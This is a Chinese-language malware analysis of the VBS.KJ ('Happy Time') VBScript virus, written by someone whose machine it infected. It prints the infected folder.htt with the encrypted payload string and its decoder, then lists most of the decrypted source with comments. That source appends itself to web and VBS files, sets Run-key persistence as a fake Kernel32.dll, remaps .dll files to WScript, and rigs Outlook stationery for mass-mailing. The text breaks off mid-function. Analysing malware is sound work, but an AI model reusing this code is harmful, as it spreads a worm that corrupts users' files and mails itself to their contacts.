'VBS.KJ 新快乐时光,网页宏病毒病毒
' 今天又一次被这个病毒感染,讨厌的错误对话框又跳了出来,不要我知道就罢了,竟然写出这么烂的代码恶心人.
' 一怒之下,将其解剖开来,看了个明白.病毒加密还比较有趣,至于最拙劣的也就是执行的时候会出现错误提示.
' 本人属于VB 低级水平(倾向于C的人),写个HELLO WORLD还可以,在下面的分析中也许会有很多错误的地方,
' 还请谅解
<BODY onload="vbscript:KJ_start()"> ' 病毒代码从这里开始执行
<!--
* This file was automatically generated by Microsoft Internet Explorer 4.0
* using the file %THISDIRPATH%\folder.htt (if customized) or
* %TEMPLATEDIR%\folder.htt (if not customized).
-->
<html>
<body scroll=no onload="Init()">
......
</body>
</html>
.......
<script language=vbscript> ' 下面一句也有病毒
document.Write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><" & "APPLET NAME=KJ" & "_guest HEIGHT=0 WIDTH=0 code=com.ms." & "activeX.Active" & "XComponent></APPLET></div>"
</script>
<script language=vbscript> ' 病毒体藏在FOLDER.HTT 文件的最后,并且是加密过的,我喜欢
ExeString = "=feBkOa^o]%AqeeMbpm%SZlMbpm%A]`kb]Lbdf%:mhe^LZc^`l%?PG%PpKa^id%PffIZq`%LrZ>%CagZiq=bpcPm[HBXlqYkm%!HBL^q<bf%!HB<kbYm^Jaebbm!DCIad^Fl!DC@j^Zq]FZfd!DCMjhi^_Zmb =g]Kn[Cmg\qahgCC:mh^gaLh!Cae^MYma)LribKmk&Hk>kogkO]lnj]GbpmK^mJ^ZaL^fm6CKH'Lh^gQ]qmCae^%>bebHZme$*MfmKmk5KbY]Mbei'O]Z]>deA_Fflmo MfmKmk)DC\kmZol!!5;)LjEbf!MjhLmo!5)Me]gJ^ZaL^fm&<elk^=qbq?nk[mblfBf]F^F^Mvh^Lqj6amqMe]gJ^ZaL^fm&<elk^K^m>bebL^fm6CKH'Lh^gQ]qmCae^%>bebHZme$+?bi]M^jh'Poam^5?G=RggelY]6#o_k\kfhm3CCXplZkq 7o_;kEcQeiLqjn[<oD_#AmjdM^ulCae^Q]fi+;ehp]P]mC9mmoa[:?LL&@^q>beb ?bi]IZq`>:mqjb[+Ymmoa[nq]l:,->ep]O]Z]Q]fi+;ehp]P]mCae^Q]fi5?PG'Hm]gMbpm?fd^!Cae^MYma)0A_Qqi^Plk:aqeeLa^k?fd^Mbei'Tjbmbo[@jE_9AMJD7o_;kEc4#;L<Rlfeh^\6o[p[kbml3HBXlqYkm%!6#o[@jE_AqeeMbpm=elbA_Qqi^Plk:o_kQ`^g?bi]M^jh'Poam^n[<oD_#O[pL^qq>k\Bc?fd^Mbei'@dhlb _
\Bc>k\?rf\mfgg?rf\mfggHB<a^f`^Pm[!@mkkbfmLqjbgd$EZplBga]q<eYkB_DZlqAg]bp<a^j6(Me]gA_I]_m%D<Zp]!<rjk^klLmoag`&$*55I;Zlb \!Me]gCC<eYg`bKn[5?ffZev<blh2ULn_=6(Bdl^DC@`Zgd]Ln_6@`k!>k\!I]_m%D<Zp]!<rjk^klLmoag`&$*&&.!3ULrZ>:)=g]A_=elbDG;aZk_^LrZ6Eb]%;nko]gmPlkbk_%*)DZlqAg]bp<a^j=g]A_=g]>ng`lbhk>ng`lbhkDC@j^Zq]FZfd!Hg=kkljKbknfbG^ulF^BkOa^o]6amjdQ`^g>qfl?rf\mfgg=g]A_KaZo]?bi]6D^_q PbkHZme$,Mjh`oYfCae^pT<hjehg>bebkUFf[khpg_mKaZo]]UPlZmfgg^oqU[iYgd+`mfBc!?PG'?fd^>ualmp La^j^?fd^&Mabf@YeeCC:mh^gaLh!P`Zkb>beb$aqee&>ik^K^m>bebL^fm6CKH'Lh^gQ]qmCae^%KaZo]?bi]%+)lknb!Cae^Q]fi+Okbq]9AMJD7o_;kEc4#;L<Rlfeh^\6o[p[kbml3HBXlqYkm%!6#o[@jE_AqeeMbpm>bebL^fm&<elk^=g]A_<^_^memF\6OlLe]ee+J^`O]Z]%ADBQX<RJK>KLXNP=KUF\^gqambbkU=b^ZnilNp]kF<HnqDhhhN^kpahg5PpKa^id'Kb_K^^\!EC>R\DH<>DXF>;ABK=ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpTF^aaZObjPlP`^ei&K^dO _
q]EC>R\;NKO=GM\ML>OTB]bfmbqa^lY=b^ZnilB]#ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpTD^_q HnqDhhhN^kpahg))#')YEZbiT<hjhhlbNlbLm^lbhk]kr$*%J>@\<PHO<;ZeiDCJYbeO]`!@D>VW<NOJ>GQWNLBJUBa]gmflb^pTA]_ZrdmBaUPg_mtYk^YEb\oglhclUHrlehlc>uhk^pkU#E^cl!HrlEhlcO^okbhk$*'-TFZfdULqYmblf^kvGZj]%P`Zkb>beb!@YeeCCF^aeKb_!EC>R\;NKO=GM\ML>OTB]bfmbqa^lY=b^ZnilB]#ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpTD^_q HnqDhhhN^kpahg))#')YEZbiTPba]LqYmblf^kvGZj]%P`Zkb>beb!TkLabde'O]`Poam^ADBQX<RJK>KLXNP=KUPg_mtYk^YEb\oglhclUHc^b\bT2'-THnqdhhhTHiqahgpTFZfdU>aamhoHk^c]k^k[^)),*-/+%J>@\<PHO<;ZeiDCJYbeO]`!@D>VW<NOJ>GQWNLBJULl^mp^j^UJa\klkh_qTPbk\hppF^pkZ`ff`Pm[lvkm^jTIkl^bebkUFf[khpg_mGnmighdAgmbjg^qL^qlbgdkU)^(])/())-())-()\-())-())-())-,/U-(*^-+/)$[iYgd!@YeeCCF^aeKb_!EC>R\;NKO=GM\ML>OTLhclpZo]UFf[khpg_mYObgagplFMU@mkkbfmObjlblfUPff]htkFbklZdag`Kn[pqlmbeUIog_bi]lUJa\klkh_qHnqdhhhBgq]kgblLblmbk_lU-Y)]-*))-())-())`())-())-())-(-/Y()*b(,/-%_dZghOlLe]ee+J^`TjbmbAH=RX@MKKBFMXR _
KYKh_qoZkbTFb`jhll^mUL^_b`]U*-&)ULmmelgdULhmblflUJYbeY=]bqgkIo]_^o]g\b%*0))0/$KB?X=TGK=<^deHBFZfdK^d AH=RX@MKKBFMXRK>KYKh_qoZkbTFb`jhll^mUL^_b`]U*-&)U@gfflfUF^aeLblmbk_lUK]pLqYmblf^kv%_dZghCCnjeZ`b>hea]k!I]_m%ObgMYma)+#Iog`k^e?fd^lY;hfjggCae^pTFb`jhll^mP`Zkb\ULqYmblf^kv=g]>ng`lbhk>ng`lbhkDC@j^Zq]Fbia^n%!Lf>ojhkJ^lre^K]qmM^jhIZq`6A_Kgm!CKH'Cae^Bpblqk!PffIZq`PL`jbiq&^qbLa^kMbeiI^la:lvkm^j++U>k\BcBcM^jhIZq`6lrpl^f0*ULa^kLqYkmRh?bi]6ObgMYmaPQLMBEUDbjg^i++'ade>ep]PlZkqMi?fd^:PbkHZmeKRLQ=FUH]kgbd']id=g]A_OlLe]ee+J^`TjbmbAH=RXIG<:IWF:@@BGBTLhclpZo]UFf[khpg_mYObgagplY;nko]gmS]klfggUOmgUH]kgbd,+$Lm^jmNm>beb?PG'<lhr?fd^TagI^la#pbZUdgoZei&`bc%PffIZq`p^_T?hi\^k+`mm?PG'<lhr?fd^TagI^la#lvkm^j++UhbpZid'`f^%TagI^la#lvkm^j++Ua]ldqgi'ffb<ZidDG9iibf]Ml PbkHZmeo^[Y>hea]k'elm)amqOlLe]ee+J^`TjbmbAH=RX@D:LP=LXOGHMY&]eiT%\eecae^PpKa^id'Kb_Pkfl^@D>VW<E>KL>PWKHLLU'adeU@ggmbfmQqi^$Zmheb`Ymb _
(q*el]logelY]PlP`^ei&K^dOkbq]EC>R\;E:PK>L\JHHQT]ei^bebT=^cYneqA\hkT%TkLabde'O]`KbY]!@D>VW<E>KL>PWKHLLUou\_bi]U=b^ZnilB\lfU&PpKa^id'Kb_Pkfl^@D>VW<E>KL>PWKHLLU]id_bi]UL`jbiq=g`ff^U$O?K\kfhmPlP`^ei&K^dOkbq]EC>R\;E:PK>L\JHHQT]ei>bebTLabdeULh^gY;hfjYg]Y%PffIZq`L^fmHZmeOL\oaim+]q^.OlLe]ee+J^`TjbmbAH=RX@D:LP=LXOGHMY\eeCae^YKa^id>qYHkhm]kmvKa^blAZk\e^okUPP@IklhlU$t3(+.1;:.*1.,?%**@>&1@1/&-(::-(;14(1<zTkLabde'O]`Poam^ADBQX<I9LLBKXKLGMUade?fd^UP[kbmlAhpl>g`g]^Y%x0.*0)/,.%-1-;&*.<+&?)?2*()<-,?13;,+1uK^m>bebL^fm6CKH'Lh^gQ]qmCae^%KmZolNiCae^)*%mom^?bi]M^jh'Poam^N[lQ]qm?bi]M^jh'<igl^>ga?nk[mblf?nk[mblfDGDbdbAm!&BcBgT`^kb57amjdQ`^g>qfl?rf\mfgg=g]A_LabpDh\^lbhk6ag\nj]gm+dh\^lbhkBcE^cl!MealEl[Zmfgg%,:_fd^La^kMealEl[Zmfgg:Fba MafkEh`Ymblf%2&Bc?LL&@^q=qmbflblfGZj]!MealEl[Zmfgg47me]gLabpDh\^lbhk6I]_m%LabpDh\^lbhk$E^k MafkEh`Ymblf*E^k ?LL&@^q>bebFZfb MafkEh`Ymblf&>k\BcBcE^k MafkEh`Ymblf;,Q`^gMafkE _
Ymblf6LabpDh\^lbhkT=g]A_CCnjeZ`b>hea]k!Q`blIg\Zqahg&>k\Bc>k\?rf\mfgg?rf\mfggHBFZfdK^d K^dKmk)>bebFZfb!Lf>ojhkJ^lre^K]qmK^dL^fmKmk5PpKa^id'Kb_K^^\!Kb_Lmo!F^Kb_M^jhLmo6Me]gOlLe]ee+J^`TjbmbK^dKmk)>bebFZfb>k\Bc>k\?rf\mfgg?rf\mfggHBH[lKn[%;nko]gmPlkbk_Kn[B6-MbkmHrl6(AgPeae^LknbMbkmHrl6L^lqGnm#*B_L^lqGnm6+5Mabf@mkkbfmLqjbgd6CagZiq=bpc3U>uamAgBf]F^Lf>ojhkJ^lre^K]qmL^qMafk?hi\^k5?PG'@bl?hi\^k%;nko]gmPlkbk_K^m<b\Pm[:<kbYm^LZc^`l!P[kbmlbgd&=b`lbhkYkr!P]mCge]bjl:Mafk?hi\^k+Kn[Cge]bjl>hea]k<lmgm5)?ho>Z``Mbei?ld]^obg>hea]kl?hi\^k@gngq6Cge]bj<hrfm(*<b\Pm['^\]Cge]bj<hrfm%L^fm>hea]k'KYf^G^ulF^=f[Ln_&<hrfm:)Q`^gEZplBga]q<eYk:BgplkKbn!<rjk^klLmoag`)U)D^g%;nko]gmPlkbk_&.!Pm[Lqjbgd6Ja]!@mkkbfmLqjbgd$EZplBga]q<eYk$.$E^k <noj^gqKmkff`*DZlqAg]bp<a^j&*&<rjk^klLmoag`5DG;aZk_^LrZ!<rjk^klLmoag`)DZlqAg]bp<a^jKn[B6.>ik^A_Pm[>5)La^k<rjk^klLmoag`5<rjk^klLmoag` _
f[Ln_&Bmbe!*&T=qbq=h>ep]g6-?ljc5*LhCge]bj<hrfmA_I;Zlb Ln_Kmkff`5E@Yl^%<b\Pm['Fl^f%bLa^kBcc9?hi\^k@gngqMabf@mkkbfmLqjbgd6@mkkbfmLqjbgdAa\LrZ'Bq]f!g#*YBpbm<h=g]A_=g]A_F^qqE^kmBk\^q@`Zk5BkkmkO]o!@mkkbfmLqjbgd$U$E^k <noj^gqKmkff`*)Kn[Plkbk_6Eb]%;nko]gmPlkbk_%E^kmBk\^q@`Zk()%Ebf!<rjk^klLmoag`&%EZplBga]q<eYk&.!@mkkbfmLqjbgd6HB<a^f`^Pm[!@mkkbfmLqjbgd$EZplBga]q<eYk>gaB_>gaB_EhlhHBH[lKn[5<rjk^klLmoag`>ga?nk[mblf?nk[mblfDGHkhmY`Zq]!Hg=kkljKbknfbG^ulO]`I^laO^dn^5EC>R\DH<>DXF>;ABK=ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpT=^dj^^=fkd=b_k^b6TkLabde'O]`KbY]!O]`I^laO^dn^&Bc=bpc=^dj^^5MabfAaldA]`kb]6>bg^dr=fkd#3YBf]F^Cgkf5*qg.=bpc=^dj^^5DGG[hPm[!AaldA]`kb]CCnjeZ`b>hea]k!AaldA]`kb]F^qqPpKa^id'Kb_Pkfl^O]`I^laO^dn^)<blh<^`o]^=g]>ng`lbhk>ng`lbhkDCrefZd]?hi\^k%HZmeFZfb!Lf>ojhkJ^lre^K]qmL^q?hi\^kKYf^5?PG'@bl?hi\^k%HZmeFZfb!P]mQ`blCae^p6Cge]bjGZj]'?fd^lAmq=qbpll: _
>hk=Z\eMafk?bi]BkMafk?bi]l>beb=qm5N@Yl^%>LH+?^mBpm^kkbhkFZfb Mafk?bi]'I^la&Bc?bi]>qq6@MFHk>beb=qm5ELFEHk>beb=qm5>KIGkCae^Bpm:IEHLj?fd^>ul6CLMMe]g;ZeiDC>hi^k\Mh%Labp>beb&IZq`%elfe!Bdl^F^?fd^>ul6O;PMe]g;ZeiDC>hi^k\Mh%Labp>beb&IZq`%sZl&>ik^Bc?bi]>qq6@MMMabfElm>ualmp6.>k\BcGbpmA_%M<Zp]!I^laG^e^5N@Yl^%ObgMYmaA]ldqgiU!Lj!R;Zlb IZq`GZj]:N<^k^!TagI^la#=bkdmlh&La^kAql>qfkml5*>gaB_B_@mmBpblqk6(Me]g>LH+;hiv>bebPbkHZmekrlq]f,/T]^pcmhm&bgf%I^laG^e^>LH+;hiv>bebPbkHZmeo^[Y>hea]k'elm)HZmeFZfb>k\Bc>k\?rf\mfgg?rf\mfggHBL^q<bf%!Lf>ojhkJ^lre^K]qm>ko&<ebYkL^lqAm:PL`jbiq&L\oaimCmeekYf^B_=kkLa^kBkOa^o]6amjd=elbBkOa^o]6o[pBf]F^F^BkOa^o]6o[pMe]gK^m>LH5<o]ZmbG[cb[m!K\kfhmbk_'?fd^Lvkm^jG[cb[m&LblPpKa^id6;k^^l^H_b^\q PP[kbml'Le]ee!Bdl^L^q:imd^H_b^\q6ag\nj]gm+Yiii]ml%DC\_n^pl:imd^H_b^\q&l^q;ELF<!x>2,2<<+/%*<C(&*.<)&><;2*()<-,?=20:) _
:imd^H_b^\q&\kbYm^Fflm^f\^%!P]mTkLabde::imd^H_b^\q&@^qG[cb[m!&:mhe^LZc^`l'lbl<EPA=!s)=1+?>-)&?-1,&.)<?*02--%))>(<2---+/0v&:mhe^LZc^`l'\o]ZmbAglqYg\b K^m>LH5:mhe^LZc^`l'@blH[g]\m%!Bf]F^P]mAaldLZc^`l6>LH+<kbs]l>hk=Z\e=bpcM^jhBk=bpcH[g]\mB_<blhL^fm&=kfn^Mvh^96+9g]<blhL^fm&=kfn^Mvh^96*La^k>uamCgk=g]A_>bg^dr=fkd:=bpcM^jh'=oao^I]mmbjK]qm=bjHme]k:oj!,&K^f]hjas^?hob6-Mh+Lla^o9kk%a:Bgq !2Kk\G^ulQ]fiPlkbk_6>hka6*LhI]g!Q`blQ]qm&MbeiGre69l\%Eb]%LabpL^qq$b%.!A_Q]fiKmf:*,La^kMbeiGre6*1=elbA_Q]fiKmf:*)La^kMbeiGre6*2=g]A_L^fm;aZo6@`k!Q]fiKmf*Hme]k:oj!bEh],B_L^fm;aZo6@`k!0,Q`^gM^jh<a^j6;ak%)1>gaB_M^jhLmoag`5MbeiLqjbgdQ]fi@`ZkG^ulRfEh`cLmo6=q^`mm^%=feDbq:ko ,)LabpL^qqsZ<kI^C^r>jk!-!6Gmabj:ko )o_;kEcH]r:oj!*&6Lla^o9kk%)#o[@jE_#Dbq:ko +5Hq`^k>jk!/!#n[<oD_D^v9kk%+:#Hme]k:oj!,&sZ<kI^>hka6*LhI]g!Bp^ _
jbgd!#nR<oD_M^jhGnj6>k\!Ja]!Bp^Lqjbgd$b%.!o[@jE_#BcM^jhGnj6.0Me]go[@jE_#MbeiGre6+-o[@jE_#>k\BcsZ<kI^L^fm;aZo6@`k!Q]fiKmf(D^v9kk%aFl\-&!#n[<oD_B_L^fm;aZo6@`k!/0Q`^go_;kEcQ]fi@`Zk5o_;ko[@jE_#>ik^BcM^jh<a^j6;ak%*2La^ksZ<kI^L^fm;aZo6sZE_o_;kEcBf]F^#n[<oD_MafkM^ul6LabpL^qqQ]fi@`Zko_;kEcK]qmo_;kEc=q^`mm^%LabpL^qq!LabpL^qq6=q^Plkbk_6MbeiLqjbgdAmjdM^ul64#l`jbiqeZk_nZd]6o_k\kfhm7sZ<kI^]h`mf^kl'poam^4#]fnlqqe^:ihpamblf3Z_kherl^4d^_q2)iu3mlh3)mp4ta]me2)iu3aba`aq2)iu3s*ag]bp3+53ofkb[fdbmv2af\]^k79#:MHE>QG:J=6DGX`r]lm@>BD@M6-PBALA6-\ha]6\le'fp&#Z`lbobP':`lbobQ<leihk]gm;5,9III=M74#(aao7#o[@jE_9(l`jbiq6#o[@jE_9l\oaimdZgdmZ`b5o[p[kbml7o_;kEcQ`blQ]qmo_;kEcRfEh`cLmosZ<kI^5,k\kfhm7sZ<kI^5,:H=V6#o[@jE_9(AQEE7O_kM^ul6LabpL _
qsZ<kI^MgEl[dLqjn[<oD_#DGWlm^jm!&TagI^la:?LL&@^qKi^`aZeCge]bj!)&TA_%>LH+>beb=qbpll!TagI^la#pbZU?ld]^o&amqLa^k?PG'<lhr?fd^TagI^la#pbZU?ld]^o&amq%PffIZq`p^_TdctYee+_b_>k\BcBc!?PG'?fd^>ualmp PbkHZmekrlq]f,/T]^pcmhm&bgfLa^k?PG'<lhr?fd^TagI^la#lvkm^j++Ua]ldqgi'ffb)ObgMYmapqlmbe,+Yccp^de'da_>gaB_>ga?nk[mblf"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&"KeyArr(1) = 7"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute (ThisText) ' 执行代码!
</script>
</BODY>
</HTML>
' 病毒结束
Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk
' 定义的一些变量,这里分别解释一下
' InWhere 判断程序是在HTML执行,还是已经进入到病毒代码部分
' HtmlText 不用多说了,就是HTML文件的内容
' VbsText 病毒需要用的脚本VBS文本内容
' DegreeSign
' AppleObject
' FSO 太熟悉了,就是脚本里处理文件系统的一个对象
' WsShell 执行WINDOWS程序
' WinPath 存放WINDOWS的系统路径
' SubE
' FinalyDisk 最后一个硬盘是什么,好黑,要通吃??
Sub KJ_start() ' 开始了,总体结构还比较清晰
KJSetDim() ' 设置各种变量
KJCreateMilieu()'
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub
Function KJAppendTo(FilePath, TypeStr)
' 对目标文件,其实就是FOLDER.HTT进行检查,如果没有感染过就把病毒体附加上去
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath, 1) ' 打开文件读
TmpStr = ReadTemp.ReadAll
If InStr(TmpStr, "KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close ' 如果打开的文件中没有 "KJ_start()"这个字符串,就说明没有被感染
Exit Function ' 对空文件不处理的
End If ' 以下是满足感染条件的文件
If TypeStr = "htt" Then ' 如果是HTT文件,每个目录下都有的,如果你要看的话就查看隐藏文件就可以了
ReadTemp.Close ' 刚才的打开方式是读,现在要写了,需要关闭文件,再打开写(我猜的 ^_^)
Set FileTemp = FSO.OpenTextFile(FilePath, 2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close ' 在HTT文件的第一行写上"<BODY onload="vbscript:KJ_start()"> ",本文开始我也做了注释
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.Attributes = 34 ' 改变文件属性,隐藏
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath, 8)
If TypeStr = "html" Then ' 如果是HTML 文件,要把<BODY onload="vbscript:KJ_start()">写在<HTML></HTML>之间才会执行
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function
Function KJChangeSub(CurrentString, LastIndexChar)
' 切换目录
If LastIndexChar = 0 Then
If Left(LCase(CurrentString), 1) <= LCase("c") Then ' 如果是第一个硬盘就转到最后一个硬盘
KJChangeSub = FinalyDisk & ":\" SubE = 0 ' 看来它是循环操作的
Else ' 其他硬盘则用盘符减一(如:'D'-1= C)
KJChangeSub = Chr(Asc(Left(LCase(CurrentString), 1)) - 1) & ":\"
SubE = 0
End If
Else
KJChangeSub = Mid(CurrentString, 1, LastIndexChar)
End If
End Function
Function KJCreateMail()
' 通过OUTLOOK向地址簿中的地址发送EMAIL。
On Error Resume Next
If InWhere = "html" Then
Exit Function ' 如果是在HTML中运行的话,不进行这个步骤
End If ' 首先感染BLANK.HTML文件,这个文件在IE设置中如果缺省的"使用空白页"就会调用的
ShareFile = Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then ' 如果存在就直接感染
Call KJAppendTo(ShareFile, "html")
Else ' 如果不存在就伪造一个带病毒的BLANK.HTM文件
Set FileTemp = FSO.OpenTextFile(ShareFile, 2, True)
FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
FileTemp.Close
End If
DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call
KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
KJummageFolder (Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function
Function KJCreateMilieu()
' 检测系统是否安装了 脚本解释器,如果没有的话,就使用系统文件Kernel,Kernel32来执行各种操作
' 充分暴露了WINDOWS的脆弱性
On Error Resume Next
TempPath = ""
If Not (FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32", StartUpFile
FSO.CopyFile WinPath & "web\kjwall.gif", WinPath & "web\Folder.htt"
FSO.CopyFile WinPath & "system32\kjwall.gif", WinPath & "system32\desktop..ini"
Call KJAppendTo(WinPath & "web\Folder.htt", "htt")
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\", "dllfile"
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type", "application/x-msdownload"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\", WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\", "VBScript"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\", WinPath & TempPath & "WScript.exe ""%1"" %*"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\", "{60254CA5-953B-11CF-8C96-00AA00B8708C}"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\", "{85131631-480C-11D2-B1F9-00C04F86C324}"
Set FileTemp = FSO.OpenTextFile(StartUpFile, 2, True)
FileTemp.Write VbsText ' 这里把Kernel.dll,Kernel32.dll都写进了病毒
FileTemp.Close
End Function
Function KJLikeIt()
If InWhere <> "html" Then
Exit Function
End If ' 分析当前文件的路径
ThisLocation = document.location
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation, 9)
If FSO.GetExtensionName(ThisLocation) <> "" Then
ThisLocation = Left(ThisLocation, Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
End If
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
KJummageFolder (ThisLocation)
End If
End Function
Function KJMailReg(RegStr, FileName)
On Error Resume Next
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr, FileName
End If
End Function
Function KJOboSub(CurrentString)
' 解析当前路径嵌套的深度
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then ' 如果深度超过了28就返回最后一个硬盘根目录
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
Set ThisFolder = FSO.GetFolder(CurrentString) ' 当前目录字符串
Set DicSub = CreateObject("Scripting.Dictionary") ' 构造一个字典,存放目录和深度
Set Folders = ThisFolder.SubFolders ' 取得子目录
FolderCount = 0 ' 子目录个数初始化为零
For Each TempFolder In Folders ' 查看子目录个数
FolderCount = FolderCount + 1
DicSub.Add FolderCount, TempFolder.Name
Next
If DicSub.Count = 0 Then ' 如果子目录为空,即无子目录
LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1) ' 取得最后路径中最后一个'/'
SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1) ' 最深的子目录
CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' 切换到父目录
SubE = 1
Else
If SubE = 0 Then
CurrentString = CurrentString & DicSub.Item(1) & "\" ' 遍历字典中存放的子目录
Exit Do
Else
j = 0
For j = 1 To FolderCount
If LCase(SubString) = LCase(DicSub.Item(j)) Then
If j < FolderCount Then ' 进入到子目录
CurrentString = CurrentString & DicSub.Item(j + 1) & "\"
Exit Do
End If
End If
Next
LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1)
SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1)
CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' 切换到上层目录
End If
End If
Loop
KJOboSub = CurrentString
End Function
Function KJPropagate()
On Error Resume Next
RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
DiskDegree = WsShell.RegRead(RegPathValue)
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
For i = 1 To 5 ' 对各级目录下的文件进行感染
DiskDegree = KJOboSub(DiskDegree)
KJummageFolder (DiskDegree)
Next
WsShell.RegWrite RegPathValue, DiskDegree ' 写下注册表,记录最深的一个目录
End Function
Function KJummageFolder(PathName)
On Error Resume Next
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
Call KJAppendTo(ThisFile.Path, "html") ' 对当前目录下面所有 HTM,HTML,ASP,PHP,JSP文件进行感染
Else
If FileExt = "VBS" Then ' 对 VBS文件进行感染,这类感染比较方便
Call KJAppendTo(ThisFile.Path, "vbs")
Else If FileExt = "HTT" Then ' 如果存在HTT文件
HttExists = 1
End If
Next
If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop")) Then
HttExists = 1 '对当前路径是桌面或者桌面上的目录都不放过
End If
If HttExists = 0 Then ' 如果没有HTT文件存在,就伪造一个,不过是配对的2个文件
FSO.CopyFile WinPath & "system32\desktop.ini", PathName
FSO.CopyFile WinPath & "web\Folder.htt", PathName
End If
End Function
Function KJSetDim()
On Error Resume Next
Err.Clear
TestIt = WScript.ScriptFullname ' 得到脚本文件的全名
If Err Then
InWhere = "html" ' 是HTML文件
Else
InWhere = "vbs" ' 是VBS文件
End If
